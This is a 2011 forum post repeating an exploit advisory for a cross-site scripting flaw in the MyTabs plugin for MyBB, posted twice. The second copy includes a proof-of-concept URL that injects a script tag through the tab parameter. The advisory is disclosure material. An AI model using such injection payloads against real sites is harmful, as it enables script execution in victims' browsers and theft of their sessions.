2011-07-05, 11:35 PM
Hello ,
# Exploit Title: MyTabs XSS Vulnerability
# Date: 06.07.2011
# Author: SH@Ð0W
# Category: MYBB plug-ins
# Version: 1.31
# Tested on: mybb 1.6.x
#Vulnerability :
Type = XSS
Injecting arbitrary HTML and Java Script code is possible while adding a '/ after the tab id .
# Example:
#Solution = Remove MyTabs.
<=================By SH@Ð0W ==================>
# Exploit Title: MyTabs XSS Vulnerability
# Date: 06.07.2011
# Author: SH@Ð0W
# Category: MYBB plug-ins
# Version: 1.31
# Tested on: mybb 1.6.x
#Vulnerability :
Type = XSS
Injecting arbitrary HTML and Java Script code is possible while adding a '/ after the tab id .
# Example:
http://website.com/index.php?tab=5'/<script>alert('shadow is back');</script>
#Solution = Remove MyTabs.
<=================By SH@Ð0W ==================>